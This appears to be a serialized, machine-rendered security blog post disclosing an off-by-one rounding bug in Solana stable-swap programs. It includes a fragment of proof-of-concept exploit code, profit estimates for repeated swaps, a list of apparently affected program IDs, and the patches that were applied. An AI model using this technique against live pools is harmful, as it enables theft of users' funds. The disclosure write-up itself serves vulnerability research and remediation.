instructions",{"type":28,"tag":116,"props":3475,"children":3476},{"style":370},[3477],{"type":33,"value":141},{"type":28,"tag":116,"props":3479,"children":3480},{"style":282},[3481],{"type":33,"value":3482},"push",{"type":28,"tag":116,"props":3484,"children":3485},{"style":266},[3486],{"type":33,"value":313},{"type":28,"tag":116,"props":3488,"children":3489},{"style":272},[3490],{"type":33,"value":3491},"swap_instruction",{"type":28,"tag":116,"props":3493,"children":3494},{"style":266},[3495],{"type":33,"value":895},{"type":28,"tag":116,"props":3497,"children":3498},{"class":245,"line":1181},[3499],{"type":28,"tag":116,"props":3500,"children":3501},{"emptyLinePlaceholder":19},[3502],{"type":33,"value":1044},{"type":28,"tag":116,"props":3504,"children":3505},{"class":245,"line":1212},[3506,3511,3515,3520,3524,3528,3533,3537,3541,3546,3550,3554,3558],{"type":28,"tag":116,"props":3507,"children":3508},{"style":272},[3509],{"type":33,"value":3510},"    env",{"type":28,"tag":116,"props":3512,"children":3513},{"style":370},[3514],{"type":33,"value":141},{"type":28,"tag":116,"props":3516,"children":3517},{"style":282},[3518],{"type":33,"value":3519},"execute_as_transaction",{"type":28,"tag":116,"props":3521,"children":3522},{"style":266},[3523],{"type":33,"value":313},{"type":28,"tag":116,"props":3525,"children":3526},{"style":370},[3527],{"type":33,"value":2780},{"type":28,"tag":116,"props":3529,"children":3530},{"style":272},[3531],{"type":33,"value":3532},"instructions",{"type":28,"tag":116,"props":3534,"children":3535},{"style":266},[3536],{"type":33,"value":825},{"type":28,"tag":116,"props":3538,"children":3539},{"style":370},[3540],{"type":33,"value":2780},{"type":28,"tag":116,"props":3542,"children":3543},{"style":282},[3544],{"type":33,"value":3545},"vec!",{"type":28,"tag":116,"props":3547,"children":3548},{"style":266},[3549],{"type":33,"value":347},{"type":28,"tag":116,"props":3551,"children":3552},{"style":370},[3553],{"type":33,"value":2780},{"type":28,"tag":116,"props":3555,"children":3556},{"style":272},[3557],{"type":33,"value":3206},{"type":28,"tag":116,"props":3559,"children":3560},{"style":266},[3561],{"type":33,"value":3422},{"type":28,"tag":116,"props":3563,"children":3564},{"class":245,"line":1254},[3565],{"type":28,"tag":116,"props":3566,"children":3567},{"style":266},[3568],{"type":33,"value":406},{"type":28,"tag":29,"props":3570,"children":3571},{},[3572],{"type":33,"value":3573},"It works!",{"type":28,"tag":107,"props":3575,"children":3576},{},[3577],{"type":28,"tag":29,"props":3578,"children":3579},{},[3580],{"type":33,"value":3581},"holy shit\nyea, this is big",{"type":28,"tag":29,"props":3583,"children":3584},{},[3585],{"type":28,"tag":206,"props":3586,"children":3588},{"alt":7,"src":3587},"/posts/spl-swap/poc.png",[],{"type":28,"tag":63,"props":3590,"children":3592},{"id":3591},"exploitability",[3593],{"type":33,"value":3594},"Exploitability",{"type":28,"tag":29,"props":3596,"children":3597},{},[3598],{"type":33,"value":3599},"Off-by-one bugs are much easier to exploit on Solana compared to other chains, enabled by the relatively low fees on Solana.",{"type":28,"tag":29,"props":3601,"children":3602},{},[3603],{"type":33,"value":3604},"A single swap on Ethereum can cost dozens of dollars, but on Solana packing hundreds of swap instructions into a single transaction costs the same flat rate of 5000 lamports (at least prior to the 1.9 per transaction size compute limit update).",{"type":28,"tag":29,"props":3606,"children":3607},{},[3608],{"type":33,"value":3609},"This transaction cost discrepancy can trip up developers who transitioned from Ethereum to Solana. For example, the developers who wrote tests for the Solana Program Library implementation of stable swap assumed the impact of an off by one error would be negligible.",{"type":28,"tag":29,"props":3611,"children":3612},{},[3613],{"type":28,"tag":206,"props":3614,"children":3616},{"alt":7,"src":3615},"/posts/spl-swap/pr.png",[],{"type":28,"tag":29,"props":3618,"children":3619},{},[3620,3622,3627],{"type":33,"value":3621},"As we mentioned previously, due to the rounding error, each swap allowed an attacker to steal a single token. It's important to keep in mind that this represents a single token ",{"type":28,"tag":2583,"props":3623,"children":3624},{},[3625],{"type":33,"value":3626},"per instruction",{"type":33,"value":3628},". Transactions on Solana can also contain multiple instructions.",{"type":28,"tag":29,"props":3630,"children":3631},{},[3632],{"type":33,"value":3633},"With an onchain program, we are able to fit over 50 swap instructions per transaction. Each transaction can be run around 3 times before exceeding the per-instruction compute limit cap. Thus, we can pack around 150 invocations per transaction.",{"type":28,"tag":29,"props":3635,"children":3636},{},[3637,3639,3644],{"type":33,"value":3638},"Some quick napkin math confirms that this ",{"type":28,"tag":2583,"props":3640,"children":3641},{},[3642],{"type":33,"value":3643},"is",{"type":33,"value":3645}," indeed profitable. At a price of $41440 per Bitcoin, we are able to steal around 6 cents per transaction.",{"type":28,"tag":29,"props":3647,"children":3648},{},[3649],{"type":28,"tag":98,"props":3650,"children":3654},{"className":3651},[3652,3653],"language-math","math-inline",[3655],{"type":28,"tag":116,"props":3656,"children":3659},{"className":3657},[3658],"katex",[3660],{"type":28,"tag":116,"props":3661,"children":3665},{"className":3662,"ariaHidden":3664},[3663],"katex-html","true",[3666,3773,3829,3869],{"type":28,"tag":116,"props":3667,"children":3670},{"className":3668},[3669],"base",[3671,3677,3683,3746,3756,3762,3769],{"type":28,"tag":116,"props":3672,"children":3676},{"className":3673,"style":3675},[3674],"strut","height:0.8141em;",[],{"type":28,"tag":116,"props":3678,"children":3681},{"className":3679},[3680],"mord",[3682],{"type":33,"value":1824},{"type":28,"tag":116,"props":3684,"children":3686},{"className":3685},[3680],[3687,3692],{"type":28,"tag":116,"props":3688,"children":3690},{"className":3689},[3680],[3691],{"type":33,"value":353},{"type":28,"tag":116,"props":3693,"children":3696},{"className":3694},[3695],"msupsub",[3697],{"type":28,"tag":116,"props":3698,"children":3701},{"className":3699},[3700],"vlist-t",[3702],{"type":28,"tag":116,"props":3703,"children":3706},{"className":3704},[3705],"vlist-r",[3707],{"type":28,"tag":116,"props":3708,"children":3711},{"className":3709,"style":3675},[3710],"vlist",[3712],{"type":28,"tag":116,"props":3713,"children":3715},{"style":3714},"top:-3.063em;margin-right:0.05em;",[3716,3722],{"type":28,"tag":116,"props":3717,"children":3721},{"className":3718,"style":3720},[3719],"pstrut","height:2.7em;",[],{"type":28,"tag":116,"props":3723,"children":3729},{"className":3724},[3725,3726,3727,3728],"sizing","reset-size6","size3","mtight",[3730],{"type":28,"tag":116,"props":3731,"children":3733},{"className":3732},[3680,3728],[3734,3740],{"type":28,"tag":116,"props":3735,"children":3737},{"className":3736},[3680,3728],[3738],{"type":33,"value":3739},"−",{"type":28,"tag":116,"props":3741,"children":3743},{"className":3742},[3680,3728],[3744],{"type":33,"value":3745},"8",{"type":28,"tag":116,"props":3747,"children":3749},{"className":3748},[3680,33],[3750],{"type":28,"tag":116,"props":3751,"children":3753},{"className":3752},[3680],[3754],{"type":33,"value":3755}," BTC",{"type":28,"tag":116,"props":3757,"children":3761},{"className":3758,"style":3760},[3759],"mspace","margin-right:0.2222em;",[],{"type":28,"tag":116,"props":3763,"children":3766},{"className":3764},[3765],"mbin",[3767],{"type":33,"value":3768},"∗",{"type":28,"tag":116,"props":3770,"children":3772},{"className":3771,"style":3760},[3759],[],{"type":28,"tag":116,"props":3774,"children":3776},{"className":3775},[3669],[3777,3782,3788,3795,3800,3806,3816,3820,3825],{"type":28,"tag":116,"props":3778,"children":3781},{"className":3779,"style":3780},[3674],"height:1em;vertical-align:-0.25em;",[],{"type":28,"tag":116,"props":3783,"children":3785},{"className":3784},[3680],[3786],{"type":33,"value":3787},"$41",{"type":28,"tag":116,"props":3789,"children":3792},{"className":3790},[3791],"mpunct",[3793],{"type":33,"value":3794},",",{"type":28,"tag":116,"props":3796,"children":3799},{"className":3797,"style":3798},[3759],"margin-right:0.1667em;",[],{"type":28,"tag":116,"props":3801,"children":3803},{"className":3802},[3680],[3804],{"type":33,"value":3805},"400/",{"type":28,"tag":116,"props":3807,"children":3809},{"className":3808},[3680,33],[3810],{"type":28,"tag":116,"props":3811,"children":3813},{"className":3812},[3680],[3814],{"type":33,"value":3815},"BTC",{"type":28,"tag":116,"props":3817,"children":3819},{"className":3818,"style":3760},[3759],[],{"type":28,"tag":116,"props":3821,"children":3823},{"className":3822},[3765],[3824],{"type":33,"value":3768},{"type":28,"tag":116,"props":3826,"children":3828},{"className":3827,"style":3760},[3759],[],{"type":28,"tag":116,"props":3830,"children":3832},{"className":3831},[3669],[3833,3838,3844,3854,3859,3865],{"type":28,"tag":116,"props":3834,"children":3837},{"className":3835,"style":3836},[3674],"height:0.8389em;vertical-align:-0.1944em;",[],{"type":28,"tag":116,"props":3839,"children":3841},{"className":3840},[3680],[3842],{"type":33,"value":3843},"150",{"type":28,"tag":116,"props":3845,"children":3847},{"className":3846},[3680,33],[3848],{"type":28,"tag":116,"props":3849,"children":3851},{"className":3850},[3680],[3852],{"type":33,"value":3853}," swaps",{"type":28,"tag":116,"props":3855,"children":3858},{"className":3856,"style":3857},[3759],"margin-right:0.2778em;",[],{"type":28,"tag":116,"props":3860,"children":3863},{"className":3861},[3862],"mrel",[3864],{"type":33,"value":373},{"type":28,"tag":116,"props":3866,"children":3868},{"className":3867,"style":3857},[3759],[],{"type":28,"tag":116,"props":3870,"children":3872},{"className":3871},[3669],[3873,3878],{"type":28,"tag":116,"props":3874,"children":3877},{"className":3875,"style":3876},[3674],"height:0.8056em;vertical-align:-0.0556em;",[],{"type":28,"tag":116,"props":3879,"children":3881},{"className":3880},[3680],[3882],{"type":33,"value":3883},"$0.0621",{"type":28,"tag":29,"props":3885,"children":3886},{},[3887],{"type":33,"value":3888},"At 200 transactions per second, we can extract just over a million dollars per day.",{"type":28,"tag":29,"props":3890,"children":3891},{},[3892],{"type":33,"value":3893},"We're well on our way to becoming a millionaire!",{"type":28,"tag":63,"props":3895,"children":3896},{"id":2019},[3897],{"type":33,"value":2022},{"type":28,"tag":29,"props":3899,"children":3900},{},[3901],{"type":33,"value":3902},"Now that we had a proof-of-concept going, it was time to contact the relevant teams.",{"type":28,"tag":29,"props":3904,"children":3905},{},[3906],{"type":33,"value":3907},"By grepping through Solana logs for the swap instruction log, we were able to identify many potential spl-token-swap forks.",{"type":28,"tag":234,"props":3909,"children":3913},{"code":3910,"language":3911,"meta":7,"className":3912,"style":7},"solana logs -um | grep 'Instruction: Swap' -B1\n","bash","language-bash shiki shiki-themes slack-dark",[3914],{"type":28,"tag":98,"props":3915,"children":3916},{"__ignoreMap":7},[3917],{"type":28,"tag":116,"props":3918,"children":3919},{"class":245,"line":246},[3920,3924,3929,3934,3939,3944,3949],{"type":28,"tag":116,"props":3921,"children":3922},{"style":282},[3923],{"type":33,"value":2551},{"type":28,"tag":116,"props":3925,"children":3926},{"style":563},[3927],{"type":33,"value":3928}," logs",{"type":28,"tag":116,"props":3930,"children":3931},{"style":563},[3932],{"type":33,"value":3933}," -um",{"type":28,"tag":116,"props":3935,"children":3936},{"style":370},[3937],{"type":33,"value":3938}," |",{"type":28,"tag":116,"props":3940,"children":3941},{"style":282},[3942],{"type":33,"value":3943}," grep",{"type":28,"tag":116,"props":3945,"children":3946},{"style":563},[3947],{"type":33,"value":3948}," 'Instruction: Swap'",{"type":28,"tag":116,"props":3950,"children":3951},{"style":563},[3952],{"type":33,"value":3953}," -B1\n",{"type":28,"tag":29,"props":3955,"children":3956},{},[3957],{"type":33,"value":3958},"With some Google dorking, we were able to identify many of these programs.",{"type":28,"tag":234,"props":3960,"children":3962},{"code":3961},"1SoLTvbiicqXZ3MJmnTL2WYXKLYpuxwHpa4yYrVQaMZ  - \"1 SOL\"\n9W959DqEETiGZocYWCQPaJ6sBmUzgfxXfqGeTEdp3aQP - Orca Swap Program v2\nSCHAtsf8mbjyjiv4LkhLKutTf6JnZAbdJKFkXQNMFHZ  - \"Sencha Swap\"\nSSwapUtytfBdBn1b9NUGG6foMVPtcWgpRU32HToDUZr  - \"Saros Swap\"\nSSwpkEEcbUqx4vtoEByFjSkhKdCT862DNVb52nZg1UZ  - Saber Stable Swap Program\nSSwpMgqNDsyV7mAgN9ady4bDVu5ySjmmXejXvy2vLt1  - Step Finance Swap Program\nSwaPpA9LAaLfeLi3a68M4DjnLqgtticKg6CnyNwgAC8  - Swap Program\n",[3963],{"type":28,"tag":98,"props":3964,"children":3965},{"__ignoreMap":7},[3966],{"type":33,"value":3961},{"type":28,"tag":29,"props":3968,"children":3969},{},[3970],{"type":33,"value":3971},"Now it was time to contact these teams.",{"type":28,"tag":29,"props":3973,"children":3974},{},[3975],{"type":33,"value":3976},"Of these protocols, Saber was the only one which had BTC stable swaps, which would make exploitation immediately profitable. Luckily, they were also the most responsive, triaging and patching the vulnerability in just over one day.",{"type":28,"tag":29,"props":3978,"children":3979},{},[3980],{"type":33,"value":3981},"After some discussion, they decided to port a patch from Curve.fi, subtracting one from the output amount.",{"type":28,"tag":234,"props":3983,"children":3985},{"code":3984,"language":2651,"meta":7,"className":2652,"style":7},"-        let dy = swap_destination_amount.checked_sub(y)?;\n+        // https://github.com/curvefi/curve-contract/blob/b0bbf77f8f93c9c5f4e415bce9cd71f0cdee960e/contracts/pool-templates/base/SwapTemplateBase.vy#L466\n+        let dy = swap_destination_amount.checked_sub(y)?.checked_sub(1)?;\n",[3986],{"type":28,"tag":98,"props":3987,"children":3988},{"__ignoreMap":7},[3989,4043,4055],{"type":28,"tag":116,"props":3990,"children":3991},{"class":245,"line":246},[3992,3997,4001,4006,4010,4015,4019,4023,4027,4031,4035,4039],{"type":28,"tag":116,"props":3993,"children":3994},{"style":370},[3995],{"type":33,"value":3996},"-",{"type":28,"tag":116,"props":3998,"children":3999},{"style":376},[4000],{"type":33,"value":2736},{"type":28,"tag":116,"props":4002,"children":4003},{"style":272},[4004],{"type":33,"value":4005}," dy",{"type":28,"tag":116,"props":4007,"children":4008},{"style":370},[4009],{"type":33,"value":2226},{"type":28,"tag":116,"props":4011,"children":4012},{"style":272},[4013],{"type":33,"value":4014}," swap_destination_amount",{"type":28,"tag":116,"props":4016,"children":4017},{"style":370},[4018],{"type":33,"value":141},{"type":28,"tag":116,"props":4020,"children":4021},{"style":282},[4022],{"type":33,"value":2906},{"type":28,"tag":116,"props":4024,"children":4025},{"style":266},[4026],{"type":33,"value":313},{"type":28,"tag":116,"props":4028,"children":4029},{"style":272},[4030],{"type":33,"value":2785},{"type":28,"tag":116,"props":4032,"children":4033},{"style":266},[4034],{"type":33,"value":1829},{"type":28,"tag":116,"props":4036,"children":4037},{"style":370},[4038],{"type":33,"value":2825},{"type":28,"tag":116,"props":4040,"children":4041},{"style":266},[4042],{"type":33,"value":384},{"type":28,"tag":116,"props":4044,"children":4045},{"class":245,"line":256},[4046,4050],{"type":28,"tag":116,"props":4047,"children":4048},{"style":370},[4049],{"type":33,"value":2268},{"type":28,"tag":116,"props":4051,"children":4052},{"style":250},[4053],{"type":33,"value":4054},"        // https://github.com/curvefi/curve-contract/blob/b0bbf77f8f93c9c5f4e415bce9cd71f0cdee960e/contracts/pool-templates/base/SwapTemplateBase.vy#L466\n",{"type":28,"tag":116,"props":4056,"children":4057},{"class":245,"line":293},[4058,4062,4066,4070,4074,4078,4082,4086,4090,4094,4098,4102,4106,4110,4114,4118,4122],{"type":28,"tag":116,"props":4059,"children":4060},{"style":370},[4061],{"type":33,"value":2268},{"type":28,"tag":116,"props":4063,"children":4064},{"style":376},[4065],{"type":33,"value":2736},{"type":28,"tag":116,"props":4067,"children":4068},{"style":272},[4069],{"type":33,"value":4005},{"type":28,"tag":116,"props":4071,"children":4072},{"style":370},[4073],{"type":33,"value":2226},{"type":28,"tag":116,"props":4075,"children":4076},{"style":272},[4077],{"type":33,"value":4014},{"type":28,"tag":116,"props":4079,"children":4080},{"style":370},[4081],{"type":33,"value":141},{"type":28,"tag":116,"props":4083,"children":4084},{"style":282},[4085],{"type":33,"value":2906},{"type":28,"tag":116,"props":4087,"children":4088},{"style":266},[4089],{"type":33,"value":313},{"type":28,"tag":116,"props":4091,"children":4092},{"style":272},[4093],{"type":33,"value":2785},{"type":28,"tag":116,"props":4095,"children":4096},{"style":266},[4097],{"type":33,"value":1829},{"type":28,"tag":116,"props":4099,"children":4100},{"style":370},[4101],{"type":33,"value":2803},{"type":28,"tag":116,"props":4103,"children":4104},{"style":282},[4105],{"type":33,"value":2906},{"type":28,"tag":116,"props":4107,"children":4108},{"style":266},[4109],{"type":33,"value":313},{"type":28,"tag":116,"props":4111,"children":4112},{"style":350},[4113],{"type":33,"value":1824},{"type":28,"tag":116,"props":4115,"children":4116},{"style":266},[4117],{"type":33,"value":1829},{"type":28,"tag":116,"props":4119,"children":4120},{"style":370},[4121],{"type":33,"value":2825},{"type":28,"tag":116,"props":4123,"children":4124},{"style":266},[4125],{"type":33,"value":384},{"type":28,"tag":29,"props":4127,"children":4128},{},[4129,4131,4138],{"type":33,"value":4130},"For reference, here is the ",{"type":28,"tag":87,"props":4132,"children":4135},{"href":4133,"rel":4134},"https://github.com/curvefi/curve-contract/blob/b0bbf77f8f93c9c5f4e415bce9cd71f0cdee960e/contracts/pool-templates/base/SwapTemplateBase.vy#L466",[91],[4136],{"type":33,"value":4137},"Curve.fi implementation",{"type":33,"value":141},{"type":28,"tag":234,"props":4140,"children":4144},{"code":4141,"language":4142,"meta":7,"className":4143,"style":7},"    dy: uint256 = xp[j] - y - 1  # -1 just in case there were some rounding errors\n    dy_fee: uint256 = dy * self.fee / FEE_DENOMINATOR\n","solidity","language-solidity shiki shiki-themes slack-dark",[4145],{"type":28,"tag":98,"props":4146,"children":4147},{"__ignoreMap":7},[4148,4211],{"type":28,"tag":116,"props":4149,"children":4150},{"class":245,"line":246},[4151,4156,4161,4166,4170,4175,4179,4184,4188,4193,4198,4202,4206],{"type":28,"tag":116,"props":4152,"children":4153},{"style":266},[4154],{"type":33,"value":4155},"    dy",{"type":28,"tag":116,"props":4157,"children":4158},{"style":370},[4159],{"type":33,"value":4160},":",{"type":28,"tag":116,"props":4162,"children":4163},{"style":339},[4164],{"type":33,"value":4165}," uint256",{"type":28,"tag":116,"props":4167,"children":4168},{"style":370},[4169],{"type":33,"value":2226},{"type":28,"tag":116,"props":4171,"children":4172},{"style":266},[4173],{"type":33,"value":4174}," xp[j] ",{"type":28,"tag":116,"props":4176,"children":4177},{"style":370},[4178],{"type":33,"value":3996},{"type":28,"tag":116,"props":4180,"children":4181},{"style":266},[4182],{"type":33,"value":4183}," y ",{"type":28,"tag":116,"props":4185,"children":4186},{"style":370},[4187],{"type":33,"value":3996},{"type":28,"tag":116,"props":4189,"children":4190},{"style":350},[4191],{"type":33,"value":4192}," 1",{"type":28,"tag":116,"props":4194,"children":4195},{"style":266},[4196],{"type":33,"value":4197},"  # ",{"type":28,"tag":116,"props":4199,"children":4200},{"style":370},[4201],{"type":33,"value":3996},{"type":28,"tag":116,"props":4203,"children":4204},{"style":350},[4205],{"type":33,"value":1824},{"type":28,"tag":116,"props":4207,"children":4208},{"style":266},[4209],{"type":33,"value":4210}," just in case there were some rounding errors\n",{"type":28,"tag":116,"props":4212,"children":4213},{"class":245,"line":256},[4214,4219,4223,4227,4231,4236,4241,4246,4251],{"type":28,"tag":116,"props":4215,"children":4216},{"style":266},[4217],{"type":33,"value":4218},"    dy_fee",{"type":28,"tag":116,"props":4220,"children":4221},{"style":370},[4222],{"type":33,"value":4160},{"type":28,"tag":116,"props":4224,"children":4225},{"style":339},[4226],{"type":33,"value":4165},{"type":28,"tag":116,"props":4228,"children":4229},{"style":370},[4230],{"type":33,"value":2226},{"type":28,"tag":116,"props":4232,"children":4233},{"style":266},[4234],{"type":33,"value":4235}," dy ",{"type":28,"tag":116,"props":4237,"children":4238},{"style":370},[4239],{"type":33,"value":4240},"*",{"type":28,"tag":116,"props":4242,"children":4243},{"style":266},[4244],{"type":33,"value":4245}," self.fee ",{"type":28,"tag":116,"props":4247,"children":4248},{"style":370},[4249],{"type":33,"value":4250},"/",{"type":28,"tag":116,"props":4252,"children":4253},{"style":266},[4254],{"type":33,"value":4255}," FEE_DENOMINATOR\n",{"type":28,"tag":29,"props":4257,"children":4258},{},[4259,4261,4268],{"type":33,"value":4260},"We originally thought this was an additional patch that didn't get ported over to Solana. However, it turns out this code was actually included in the ",{"type":28,"tag":87,"props":4262,"children":4265},{"href":4263,"rel":4264},"https://github.com/curvefi/curve-contract/commit/0fd801df7488d89f0e2fc81e760942d7858b01d6",[91],[4266],{"type":33,"value":4267},"original commit",{"type":33,"value":4269},", not as an additional security patch.",{"type":28,"tag":234,"props":4271,"children":4273},{"code":4272},"commit 0fd801df7488d89f0e2fc81e760942d7858b01d6\nAuthor: Ben Hauser \u003Cben@hauser.id>\nDate:   Mon Aug 31 02:35:30 2020 +0300\n\n    feat: add base pool without lending\n",[4274],{"type":28,"tag":98,"props":4275,"children":4276},{"__ignoreMap":7},[4277],{"type":33,"value":4272},{"type":28,"tag":29,"props":4279,"children":4280},{},[4281,4283,4290],{"type":33,"value":4282},"The commit adding stable swaps to SPL was ",{"type":28,"tag":87,"props":4284,"children":4287},{"href":4285,"rel":4286},"https://github.com/solana-labs/solana-program-library/commit/d62ddd2b94d5d2daaa97460b165d288610a87623",[91],[4288],{"type":33,"value":4289},"made a few months later",{"type":33,"value":4291},", meaning there was some disconnect when porting the code. Either the rounding was thought to be unnecesary, or it was simply forgotten.",{"type":28,"tag":234,"props":4293,"children":4295},{"code":4294},"commit d62ddd2b94d5d2daaa97460b165d288610a87623\nAuthor: Yuriy Savchenko \u003Cyuriy.savchenko@gmail.com>\nDate:   Tue Nov 17 15:13:18 2020 +0200\n\n    Added stable curve invariant to the token swap smart contract (#838)\n\n    * Added stable curve invariant to the token swap smart contract\n\n    * Fixed formatting\n\n    * Added missing stable curve constraints\n\n    * Symbol renames to make math clearer\n\n    * Small refactoring according to PR comments, fixes for JS tests\n",[4296],{"type":28,"tag":98,"props":4297,"children":4298},{"__ignoreMap":7},[4299],{"type":33,"value":4294},{"type":28,"tag":29,"props":4301,"children":4302},{},[4303,4305,4312],{"type":33,"value":4304},"After contacting some other swap projects which were unaffected, we decided to notify the Solana team in order to get a patch upstreamed to ",{"type":28,"tag":87,"props":4306,"children":4309},{"href":4307,"rel":4308},"https://github.com/solana-labs/solana-program-library",[91],[4310],{"type":33,"value":4311},"the Solana Program Library",{"type":33,"value":141},{"type":28,"tag":29,"props":4314,"children":4315},{},[4316],{"type":33,"value":4317},"While few projects deploy the swap program from the Solana Program Library, the SPL program is meant as a reference implementation, and many exchanges fork their own code off of it.",{"type":28,"tag":29,"props":4319,"children":4320},{},[4321,4328],{"type":28,"tag":87,"props":4322,"children":4325},{"href":4323,"rel":4324},"https://github.com/joncinque",[91],[4326],{"type":33,"value":4327},"@joncinque",{"type":33,"value":4329}," helped triage this patch. We also asked him for his thoughts on a more complete solution.",{"type":28,"tag":107,"props":4331,"children":4332},{},[4333],{"type":28,"tag":29,"props":4334,"children":4335},{},[4336],{"type":33,"value":4337},"Honestly, the idea of just subtracting 1 from the output will cover almost all situations correctly, so it's a good quick solution. I'll take a look to see if we can solve this for all situations through a correct application of checked_ceil_div, as with the constant product curve.",{"type":28,"tag":29,"props":4339,"children":4340},{},[4341,4343,4350,4352,4358],{"type":33,"value":4342},"After some thought, he helped ",{"type":28,"tag":87,"props":4344,"children":4347},{"href":4345,"rel":4346},"https://github.com/solana-labs/solana-program-library/pull/2942",[91],[4348],{"type":33,"value":4349},"introduce a PR",{"type":33,"value":4351}," which ceilings the computation in ",{"type":28,"tag":98,"props":4353,"children":4355},{"className":4354},[],[4356],{"type":33,"value":4357},"compute_new_destination_amount",{"type":33,"value":4359}," to correctly round within the stable curve math library.",{"type":28,"tag":234,"props":4361,"children":4363},{"code":4362,"language":2651,"meta":7,"className":2652,"style":7},"     // Solve for y by approximating: y**2 + b*y = c\n     let mut y_prev: U256;\n     let mut y = d_val;\n     for _ in 0..ITERATIONS {\n-        y_prev = y;\n-        y = (checked_u8_power(&y, 2)?.checked_add(c)?)\n-            .checked_div(checked_u8_mul(&y, 2)?.checked_add(b)?.checked_sub(d_val)?)?;\n-        if y == y_prev {\n+        let (y_new, _) = (checked_u8_power(&y, 2)?.checked_add(c)?)\n+            .checked_ceil_div(checked_u8_mul(&y, 2)?.checked_add(b)?.checked_sub(d_val)?)?;\n+        if y_new == y {\n             break;\n+        } else {\n+            y = y_new;\n         }\n",[4364],{"type":28,"tag":98,"props":4365,"children":4366},{"__ignoreMap":7},[4367,4375,4405,4432,4460,4484,4560,4664,4691,4786,4889,4916,4928,4947,4970],{"type":28,"tag":116,"props":4368,"children":4369},{"class":245,"line":246},[4370],{"type":28,"tag":116,"props":4371,"children":4372},{"style":250},[4373],{"type":33,"value":4374},"     // Solve for y by approximating: y**2 + b*y = c\n",{"type":28,"tag":116,"props":4376,"children":4377},{"class":245,"line":256},[4378,4383,4387,4392,4396,4401],{"type":28,"tag":116,"props":4379,"children":4380},{"style":376},[4381],{"type":33,"value":4382},"     let",{"type":28,"tag":116,"props":4384,"children":4385},{"style":376},[4386],{"type":33,"value":2677},{"type":28,"tag":116,"props":4388,"children":4389},{"style":272},[4390],{"type":33,"value":4391}," y_prev",{"type":28,"tag":116,"props":4393,"children":4394},{"style":370},[4395],{"type":33,"value":4160},{"type":28,"tag":116,"props":4397,"children":4398},{"style":339},[4399],{"type":33,"value":4400}," U256",{"type":28,"tag":116,"props":4402,"children":4403},{"style":266},[4404],{"type":33,"value":384},{"type":28,"tag":116,"props":4406,"children":4407},{"class":245,"line":293},[4408,4412,4416,4420,4424,4428],{"type":28,"tag":116,"props":4409,"children":4410},{"style":376},[4411],{"type":33,"value":4382},{"type":28,"tag":116,"props":4413,"children":4414},{"style":376},[4415],{"type":33,"value":2677},{"type":28,"tag":116,"props":4417,"children":4418},{"style":272},[4419],{"type":33,"value":2682},{"type":28,"tag":116,"props":4421,"children":4422},{"style":370},[4423],{"type":33,"value":2226},{"type":28,"tag":116,"props":4425,"children":4426},{"style":272},[4427],{"type":33,"value":2691},{"type":28,"tag":116,"props":4429,"children":4430},{"style":266},[4431],{"type":33,"value":384},{"type":28,"tag":116,"props":4433,"children":4434},{"class":245,"line":361},[4435,4440,4444,4448,4452,4456],{"type":28,"tag":116,"props":4436,"children":4437},{"style":260},[4438],{"type":33,"value":4439},"     for",{"type":28,"tag":116,"props":4441,"children":4442},{"style":272},[4443],{"type":33,"value":2708},{"type":28,"tag":116,"props":4445,"children":4446},{"style":376},[4447],{"type":33,"value":2713},{"type":28,"tag":116,"props":4449,"children":4450},{"style":350},[4451],{"type":33,"value":2718},{"type":28,"tag":116,"props":4453,"children":4454},{"style":370},[4455],{"type":33,"value":2723},{"type":28,"tag":116,"props":4457,"children":4458},{"style":266},[4459],{"type":33,"value":2728},{"type":28,"tag":116,"props":4461,"children":4462},{"class":245,"line":387},[4463,4467,4472,4476,4480],{"type":28,"tag":116,"props":4464,"children":4465},{"style":370},[4466],{"type":33,"value":3996},{"type":28,"tag":116,"props":4468,"children":4469},{"style":272},[4470],{"type":33,"value":4471},"        y_prev",{"type":28,"tag":116,"props":4473,"children":4474},{"style":370},[4475],{"type":33,"value":2226},{"type":28,"tag":116,"props":4477,"children":4478},{"style":272},[4479],{"type":33,"value":2682},{"type":28,"tag":116,"props":4481,"children":4482},{"style":266},[4483],{"type":33,"value":384},{"type":28,"tag":116,"props":4485,"children":4486},{"class":245,"line":400},[4487,4491,4496,4500,4504,4508,4512,4516,4520,4524,4528,4532,4536,4540,4544,4548,4552,4556],{"type":28,"tag":116,"props":4488,"children":4489},{"style":370},[4490],{"type":33,"value":3996},{"type":28,"tag":116,"props":4492,"children":4493},{"style":272},[4494],{"type":33,"value":4495},"        y",{"type":28,"tag":116,"props":4497,"children":4498},{"style":370},[4499],{"type":33,"value":2226},{"type":28,"tag":116,"props":4501,"children":4502},{"style":266},[4503],{"type":33,"value":269},{"type":28,"tag":116,"props":4505,"children":4506},{"style":282},[4507],{"type":33,"value":2771},{"type":28,"tag":116,"props":4509,"children":4510},{"style":266},[4511],{"type":33,"value":313},{"type":28,"tag":116,"props":4513,"children":4514},{"style":370},[4515],{"type":33,"value":2780},{"type":28,"tag":116,"props":4517,"children":4518},{"style":272},[4519],{"type":33,"value":2785},{"type":28,"tag":116,"props":4521,"children":4522},{"style":266},[4523],{"type":33,"value":825},{"type":28,"tag":116,"props":4525,"children":4526},{"style":350},[4527],{"type":33,"value":2794},{"type":28,"tag":116,"props":4529,"children":4530},{"style":266},[4531],{"type":33,"value":1829},{"type":28,"tag":116,"props":4533,"children":4534},{"style":370},[4535],{"type":33,"value":2803},{"type":28,"tag":116,"props":4537,"children":4538},{"style":282},[4539],{"type":33,"value":2808},{"type":28,"tag":116,"props":4541,"children":4542},{"style":266},[4543],{"type":33,"value":313},{"type":28,"tag":116,"props":4545,"children":4546},{"style":272},[4547],{"type":33,"value":1797},{"type":28,"tag":116,"props":4549,"children":4550},{"style":266},[4551],{"type":33,"value":1829},{"type":28,"tag":116,"props":4553,"children":4554},{"style":370},[4555],{"type":33,"value":2825},{"type":28,"tag":116,"props":4557,"children":4558},{"style":266},[4559],{"type":33,"value":2830},{"type":28,"tag":116,"props":4561,"children":4562},{"class":245,"line":614},[4563,4567,4571,4576,4580,4584,4588,4592,4596,4600,4604,4608,4612,4616,4620,4624,4628,4632,4636,4640,4644,4648,4652,4656,4660],{"type":28,"tag":116,"props":4564,"children":4565},{"style":370},[4566],{"type":33,"value":3996},{"type":28,"tag":116,"props":4568,"children":4569},{"style":370},[4570],{"type":33,"value":2838},{"type":28,"tag":116,"props":4572,"children":4573},{"style":282},[4574],{"type":33,"value":4575},"checked_div",{"type":28,"tag":116,"props":4577,"children":4578},{"style":266},[4579],{"type":33,"value":313},{"type":28,"tag":116,"props":4581,"children":4582},{"style":282},[4583],{"type":33,"value":2852},{"type":28,"tag":116,"props":4585,"children":4586},{"style":266},[4587],{"type":33,"value":313},{"type":28,"tag":116,"p